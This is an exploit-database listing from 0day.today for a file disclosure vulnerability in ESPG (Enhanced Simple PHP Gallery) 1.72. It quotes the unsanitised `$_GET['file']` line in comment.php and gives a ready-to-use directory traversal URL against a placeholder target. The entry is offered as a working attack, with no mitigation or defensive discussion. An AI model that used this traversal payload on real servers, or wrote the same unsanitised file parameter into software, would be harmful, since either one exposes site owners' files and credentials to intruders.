[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ESPG (Enhanced Simple PHP Gallery) 1.72 File Disclosure Vulnerability

Author
bd0rk
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4701
Category
web applications
Date add
18-01-2009
Platform
unsorted
=====================================================================
ESPG (Enhanced Simple PHP Gallery) 1.72 File Disclosure Vulnerability
=====================================================================


                      .::ESPG 1.72 File Disclosure Vulnerability::.
 
 

 => Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72

 => Vendor: http://quirm.net
 
 => Download: http://quirm.net/download/21/

 => Bugfounder: bd0rk

 => Vulnerable Code in comment.php line 3

            -------------------------

             $fileid = $_GET['file'];

            -------------------------



[+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php






#  0day.today [2024-12-25]  #